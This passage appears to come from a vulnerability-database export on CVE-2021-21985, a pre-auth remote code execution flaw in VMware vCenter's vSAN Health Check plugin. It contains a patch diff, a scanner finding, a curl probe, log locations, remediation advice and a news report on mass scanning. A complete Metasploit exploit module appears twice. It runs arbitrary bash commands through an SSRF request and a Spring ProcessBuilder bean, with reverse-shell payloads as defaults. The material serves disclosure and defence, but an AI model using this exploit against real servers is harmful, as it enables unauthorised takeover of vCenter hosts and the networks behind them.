<param-name>contextConfigLocation</param-name>\n- <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ <param-value>/WEB-INF/spring/empy-context.xml</param-value>\n </init-param>\n\n <!-- The application context needs to be OSGI-enabled in order to look up services -->\n@@ -40,4 +55,14 @@\n <url-pattern>/*</url-pattern>\n </filter-mapping>\n\n+ <filter>\n+ <filter-name>authenticationFilter</filter-name>\n+ <filter-class>com.vmware.vsan.client.services.AuthenticationFilter</filter-class>\n+ </filter>\n+\n+ <filter-mapping>\n+ <filter-name>authenticationFilter</filter-name>\n+ <url-pattern>/rest/*</url-pattern>\n+ </filter-mapping>\n+\n </web-app>\n```\n\n```java\npackage com.vmware.vsan.client.services;\n\nimport com.vmware.vise.usersession.UserSessionService;\nimport java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.config.AutowireCapableBeanFactory;\nimport org.springframework.web.context.WebApplicationContext;\nimport org.springframework.web.context.support.WebApplicationContextUtils;\n\npublic class AuthenticationFilter implements Filter {\n private static final Logger logger = LoggerFactory.getLogger(AuthenticationFilter.class);\n\n @Autowired\n private UserSessionService userSessionService;\n\n public void init(FilterConfig filterConfig) {\n WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(filterConfig.getServletContext());\n AutowireCapableBeanFactory factory = context.getAutowireCapableBeanFactory();\n factory.autowireBean(this);\n }\n\n public void 
doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException {\n if (this.userSessionService.getUserSession() == null) {\n HttpServletRequest httpRequest = (HttpServletRequest)request;\n HttpServletResponse httpResponse = (HttpServletResponse)response;\n logger.warn(String.format(\"Null session detected for a %s request to %s\", new Object[] { httpRequest.getMethod(), httpRequest.getRequestURL() }));\n httpResponse.setStatus(401);\n return;\n }\n filterChain.doFilter(request, response);\n }\n\n public void destroy() {}\n}\n```\n\nFurthermore, additional input validation was added to the `com.vmware.vsan.client.services.ProxygenController` class:\n\n```java\n--- a/unpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n+++ b/patched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n@@ -1,151 +1,152 @@\n package com.vmware.vsan.client.services;\n\n import com.google.common.collect.ImmutableMap;\n import com.google.gson.Gson;\n+import com.vmware.proxygen.ts.TsService;\n import com.vmware.vim.binding.vmodl.LocalizableMessage;\n import com.vmware.vim.binding.vmodl.MethodFault;\n import com.vmware.vim.binding.vmodl.RuntimeFault;\n import com.vmware.vsphere.client.vsan.util.MessageBundle;\n import java.lang.reflect.InvocationTargetException;\n import java.lang.reflect.Method;\n import java.util.HashMap;\n import java.util.List;\n import java.util.Map;\n import org.apache.commons.lang.StringUtils;\n import org.slf4j.Logger;\n import org.slf4j.LoggerFactory;\n import org.springframework.beans.BeansException;\n import org.springframework.beans.factory.BeanFactory;\n import org.springframework.beans.factory.annotation.Autowired;\n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.PathVariable;\n import org.springframework.web.bind.annotation.RequestBody;\n import 
org.springframework.web.bind.annotation.RequestMapping;\n import org.springframework.web.bind.annotation.RequestMethod;\n import org.springframework.web.bind.annotation.RequestParam;\n import org.springframework.web.bind.annotation.ResponseBody;\n import org.springframework.web.multipart.MultipartFile;\n\n @Controller\n @RequestMapping({\"/proxy\"})\n public class ProxygenController extends RestControllerBase {\n private static final Logger logger = LoggerFactory.getLogger(ProxygenController.class);\n\n @Autowired\n private BeanFactory beanFactory;\n\n @Autowired\n private MessageBundle messages;\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"application/json\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithJson(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestBody Map<String, Object> body) throws Exception {\n List<Object> rawData = null;\n try {\n rawData = (List<Object>)body.get(\"methodInput\");\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, null, rawData);\n }\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"multipart/form-data\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithMultipartFormData(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestParam(\"file\") MultipartFile[] files, @RequestParam(\"methodInput\") String rawData) throws Exception {\n List<Object> data = null;\n try {\n Gson gson = new Gson();\n data = (List<Object>)gson.fromJson(rawData, List.class);\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return 
handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, files, data);\n }\n\n private Object invokeService(String beanIdOrClassName, String methodName, MultipartFile[] files, List<Object> data) throws Exception {\n try {\n Object bean = null;\n String beanName = null;\n Class<?> beanClass = null;\n try {\n beanClass = Class.forName(beanIdOrClassName);\n beanName = StringUtils.uncapitalize(beanClass.getSimpleName());\n } catch (ClassNotFoundException classNotFoundException) {\n beanName = beanIdOrClassName;\n }\n try {\n bean = this.beanFactory.getBean(beanName);\n } catch (BeansException beansException) {\n bean = this.beanFactory.getBean(beanClass);\n }\n byte b;\n int i;\n Method[] arrayOfMethod;\n for (i = (arrayOfMethod = bean.getClass().getMethods()).length, b = 0; b < i; ) {\n Method method = arrayOfMethod[b];\n- if (!method.getName().equals(methodName)) {\n+ if (!method.getName().equals(methodName) || !method.isAnnotationPresent((Class)TsService.class)) {\n b++;\n continue;\n }\n ProxygenSerializer serializer = new ProxygenSerializer();\n Object[] methodInput = serializer.deserializeMethodInput(data, files, method);\n Object result = method.invoke(bean, methodInput);\n Map<String, Object> map = new HashMap<>();\n map.put(\"result\", serializer.serialize(result));\n return map;\n }\n } catch (Exception e) {\n logger.error(\"service method failed to invoke\", e);\n return handleException(e);\n }\n logger.error(\"service method not found: \" + methodName + \" @ \" + beanIdOrClassName);\n return handleException(null);\n }\n\n private Object handleException(Throwable t) {\n if (t instanceof InvocationTargetException)\n return handleException(((InvocationTargetException)t).getTargetException());\n if (t instanceof java.util.concurrent.ExecutionException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vise.data.query.DataException && t.getCause() != t)\n return handleException(t.getCause());\n if (t 
instanceof com.vmware.vim.vmomi.client.common.UnexpectedStatusCodeException)\n return ImmutableMap.of(\"error\", this.messages.string(\"util.dataservice.notRespondingFault\"));\n if (t instanceof VsanUiLocalizableException) {\n VsanUiLocalizableException localizableException = (VsanUiLocalizableException)t;\n return ImmutableMap.of(\"error\", this.messages.string(\n localizableException.getErrorKey(), localizableException.getParams()));\n }\n LocalizableMessage[] faultMessage = null;\n String vmodlMessage = null;\n if (t instanceof MethodFault) {\n faultMessage = ((MethodFault)t).getFaultMessage();\n vmodlMessage = ((MethodFault)t).getMessage();\n } else if (t instanceof RuntimeFault) {\n faultMessage = ((RuntimeFault)t).getFaultMessage();\n vmodlMessage = ((RuntimeFault)t).getMessage();\n }\n if (faultMessage != null) {\n byte b;\n int i;\n LocalizableMessage[] arrayOfLocalizableMessage;\n for (i = (arrayOfLocalizableMessage = faultMessage).length, b = 0; b < i; ) {\n LocalizableMessage localizable = arrayOfLocalizableMessage[b];\n if (localizable.getMessage() != null && !localizable.getMessage().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getMessage()));\n if (localizable.getKey() != null && !localizable.getKey().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getKey()));\n b++;\n }\n }\n if (StringUtils.isNotBlank(vmodlMessage))\n return ImmutableMap.of(\"error\", vmodlMessage);\n return ImmutableMap.of(\"error\", this.messages.string(\"vsan.common.generic.error\"));\n }\n\n private String localizeFault(String key) {\n return key;\n }\n }\n```\n\nWhich appears to be vulnerable to Java [unsafe reflection](https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection):\n\n```\nunpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\nseverity:warning rule:java.lang.security.audit.unsafe-reflection.unsafe-reflection: If an attacker can supply values that the 
application then uses to determine which class to instantiate or which method to invoke,\nthe potential exists for the attacker to create control flow paths through the application\nthat were not intended by the application developers.\nThis attack vector may allow the attacker to bypass authentication or access control checks\nor otherwise cause the application to behave in an unexpected manner.\n\n73: beanClass = Class.forName(beanIdOrClassName);\n```\n\n### PoC\n\nThe affected endpoint is `/ui/h5-vsan/rest/proxy/service`, which responds to `POST` request:\n\n```shell\nwvu@kharak:~$ curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H \"Content-Type: application/json\" -d {}\n* Trying [redacted]...\n* TCP_NODELAY set\n* Connected to [redacted] ([redacted]) port 443 (#0)\n* ALPN, offering h2\n* ALPN, offering http/1.1\n* successfully set certificate verify locations:\n* CAfile: /etc/ssl/cert.pem\n CApath: none\n* TLSv1.2 (OUT), TLS handshake, Client hello (1):\n* TLSv1.2 (IN), TLS handshake, Server hello (2):\n* TLSv1.2 (IN), TLS handshake, Certificate (11):\n* TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n* TLSv1.2 (IN), TLS handshake, Server finished (14):\n* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (OUT), TLS handshake, Finished (20):\n* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (IN), TLS handshake, Finished (20):\n* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n* ALPN, server did not agree to a protocol\n* Server certificate:\n* subject: CN=[redacted]; C=US\n* start date: Apr 20 21:05:53 2020 GMT\n* expire date: Apr 15 21:05:51 2030 GMT\n* issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=vcenter-6-7; OU=VMware Engineering\n* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n> POST /ui/h5-vsan/rest/proxy/service/CLASS/METHOD HTTP/1.1\n> Host: 
[redacted]\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Type: application/json\n> Content-Length: 2\n>\n* upload completely sent off: 2 out of 2 bytes\n< HTTP/1.1 200\n< Set-Cookie: JSESSIONID=AF396E0FF5219A869AD53ABF34B7B0AF; Path=/ui/h5-vsan; HttpOnly\n< Content-Type: application/json;charset=UTF-8\n< Transfer-Encoding: chunked\n< Date: Thu, 27 May 2021 17:32:13 GMT\n< Server: Anonymous\n<\n* Connection #0 to host [redacted] left intact\n{\"error\":\"CLASS cannot be found by com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main in KernelBundleClassLoader: [bundle=com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main]\"}* Closing connection 0\nwvu@kharak:~$\n```\n\nNote that this PoC **does not** achieve RCE on its own.\n\n### IOCs\n\n> The default log location for Virtual SAN health check plugin is `/var/log/vmware/vsan-health`. And user can change it by modifying the configuration item \u201c`logdir`\u201d in the configuration file under `/usr/lib/vmware-vpx/vsan-health`. On the vCenter Server for Windows, the file is located in `%VMWARE_LOG_DIR%\\vsan-health`. 
**No security related information is logged in the log file.**\n\nhttps://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/products/products/vsan/vmw-gdl-vsan-health-check.pdf\n\n> The vCenter Server logs are placed in a different directory on disk depending on vCenter Server version and the deployed platform:\n>\n> - vCenter Server 6.x and higher versions on Windows server: `C:\\ProgramData\\VMware\\vCenterServer\\Logs\\`\n> - vCenter Server Appliance 6.x: `/var/log/vmware/`\n> - vCenter Server Appliance 6.x flash: `/var/log/vmware/vsphere-client`\n> - vCenter Server Appliance 6.x HTML5: `/var/log/vmware/vsphere-ui`\n\nhttps://kb.vmware.com/s/article/1021804\n\n> This article provides steps to increase the size and number of the `hostd`, `vpxa`, and `vpxd` logs so that additional data is saved. This data may be useful for troubleshooting purposes.\n\nhttps://kb.vmware.com/s/article/1004795\n\n## Guidance\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](https://kb.vmware.com/s/article/83829). 
Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\n## References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n- https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\n- https://core.vmware.com/resource/vmsa-2021-0010-faq", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "seebug", "title": "VMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-21985\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T00:00:00", "id": "SSV:99260", "href": "https://www.seebug.org/vuldb/ssvid-99260", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-20T01:16:20", "description": "This Metasploit module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. 
Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T00:00:00", "type": "zdt", "title": "VMware vCenter Server Virtual SAN Health Check Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-16T00:00:00", "id": "1337DAY-ID-36564", "href": "https://0day.today/exploit/description/36564", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',\n 'Description' => %q{\n This module exploits Java unsafe reflection and SSRF in the VMware\n vCenter Server Virtual SAN Health Check plugin's ProxygenController\n class to execute 
code as the vsphere-ui user.\n\n See the vendor advisory for affected and patched versions. Tested\n against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n },\n 'Author' => [\n 'Ricter Z', # Discovery and PoC used\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21985'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],\n ['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],\n ['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],\n # Other great writeups!\n ['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],\n ['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],\n ['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],\n ['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']\n ],\n 'DisclosureDate' => '2021-05-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # 
https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => ['user.name', nil]\n }.to_json\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('System property user.name is vsphere-ui.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(cmd)\n\n url = OfflineBundle.new(cmd).to_url\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => [\n [\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"],\n false # lazyInit\n ]\n }.to_json\n )\n\n fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200\n end\n\n class OfflineBundle\n attr_accessor :cmd\n\n def initialize(cmd)\n @cmd = cmd\n end\n\n def to_xml\n bean = Rex::Text.rand_text_alpha_lower(8..16)\n prop = Rex::Text.rand_text_alpha_lower(8..16)\n\n # https://www.tutorialspoint.com/spring/spring_bean_definition.htm\n <<~XML\n <beans>\n <bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\">\n <constructor-arg>\n <list>\n <value>/bin/bash</value>\n <value>-c</value>\n <value><![CDATA[#{cmd}]]></value>\n </list>\n </constructor-arg>\n <property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/>\n </bean>\n </beans>\n XML\n end\n\n def to_zip\n Msf::Util::EXE.to_zip([\n fname: 'offline_bundle.xml',\n data: to_xml.gsub(/^\\s+/, 
'').tr(\"\\n\", '')\n ])\n end\n\n def to_url\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs\n \"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\"\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36564", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-07-13T15:55:44", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Virtual SAN Health Check Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163487", "href": "https://packetstormsecurity.com/files/163487/VMware-vCenter-Server-Virtual-SAN-Health-Check-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE', \n'Description' => %q{ \nThis module exploits Java unsafe reflection and SSRF in the VMware \nvCenter Server Virtual SAN Health Check plugin's ProxygenController \nclass to execute code as the vsphere-ui user. \n \nSee the vendor advisory for affected and patched versions. Tested \nagainst VMware vCenter Server 6.7 Update 3m (Linux appliance). 
\n}, \n'Author' => [ \n'Ricter Z', # Discovery and PoC used \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21985'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'], \n['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'], \n['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'], \n# Other great writeups! \n['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'], \n['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'], \n['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'], \n['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC'] \n], \n'DisclosureDate' => '2021-05-25', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri( \ntarget_uri.path, 
\n'/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty' \n), \n'ctype' => 'application/json', \n'data' => { \n'methodInput' => ['user.name', nil] \n}.to_json \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui' \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('System property user.name is vsphere-ui.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(cmd) \n \nurl = OfflineBundle.new(cmd).to_url \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri( \ntarget_uri.path, \n'/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages' \n), \n'ctype' => 'application/json', \n'data' => { \n'methodInput' => [ \n[\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"], \nfalse # lazyInit \n] \n}.to_json \n) \n \nfail_with(Failure::PayloadFailed, cmd) unless res&.code == 200 \nend \n \nclass OfflineBundle \nattr_accessor :cmd \n \ndef initialize(cmd) \n@cmd = cmd \nend \n \ndef to_xml \nbean = Rex::Text.rand_text_alpha_lower(8..16) \nprop = Rex::Text.rand_text_alpha_lower(8..16) \n \n# https://www.tutorialspoint.com/spring/spring_bean_definition.htm \n<<~XML \n<beans> \n<bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\"> \n<constructor-arg> \n<list> \n<value>/bin/bash</value> \n<value>-c</value> \n<value><![CDATA[#{cmd}]]></value> \n</list> \n</constructor-arg> \n<property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/> \n</bean> \n</beans> \nXML \nend \n \ndef to_zip \nMsf::Util::EXE.to_zip([ \nfname: 'offline_bundle.xml', \ndata: to_xml.gsub(/^\\s+/, '').tr(\"\\n\", '') \n]) \nend \n \ndef to_url \n# https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs 
\n\"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\" \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163487/vmware_vcenter_vsan_health_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-dg9ULZEsvBw/YLtYdH9lzzI/AAAAAAAACwY/7b0FWkEi2AgXUuJHgibePqXxv9PEVVCsgCLcBGAsYHQ/s0/VMware-vSphere.jpg>)\n\nMalicious actors are actively mass scanning the internet for vulnerable VMware vCenter servers that are unpatched against a critical remote code execution flaw, which the company addressed late last month.\n\nThe ongoing activity was detected by Bad Packets on June 3 and corroborated [yesterday](<https://twitter.com/GossiTheDog/status/1397315303978250242/photo/2>) by security researcher Kevin Beaumont. \"Mass scanning activity detected from 104.40.252.159 checking for VMware vSphere hosts vulnerable to remote code execution,\" [tweeted](<https://twitter.com/bad_packets/status/1400519385194766336>) Troy Mursch, chief research officer at Bad Packets.\n\nThe development follows the publication of a [proof-of-concept](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) (PoC) RCE exploit code targeting the VMware vCenter bug.\n\nTracked as [CVE-2021-21985](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) (CVSS score 9.8), the issue is a consequence of a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which could be abused by an attacker to execute commands with unrestricted privileges on the underlying operating system that hosts the vCenter Server.\n\n[](<https://thehackernews.com/images/-2asxg2RGcVA/YLtXChb2ejI/AAAAAAAACwQ/ZlUYBOtRqGk1olUdewgacDkLMEk-xHXBwCLcBGAsYHQ/s0/poc.jpg>)\n\nAlthough the flaw was rectified by VMware on May 25, the company [strongly 
urged](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) its customers to apply the emergency change immediately. \"In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\" VMware said.\n\n[](<https://thehackernews.com/images/-gksBmuc98pQ/YLtWoqAxynI/AAAAAAAACwI/Xo8VvglhuhAdPffdp8I8DtnckVZbSzIKwCLcBGAsYHQ/s0/shodan.jpg>)\n\nThis is not the first time adversaries have opportunistically mass scanned the internet for vulnerable VMware vCenter servers. A similar remote code execution vulnerability ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by VMware in February became the [target of cyber threat actors](<https://twitter.com/bad_packets/status/1364661586070102016>) attempting to exploit and take control of unpatched systems.\n\nAt least [14,858 vCenter servers](<https://twitter.com/bad_packets/status/1364672466707128320>) were found reachable over the internet at the time, according to Bad Packets and Binary Edge.\n\nWhat's more, new research from Cisco Talos earlier this week found that the threat actor behind the Python-based [Necro](<https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html>) bot wormed its way into exposed VMware vCenter servers by abusing the same security weakness to boost the malware's infection propagation capabilities.\n\n \n\n\nFound this article interesting? 
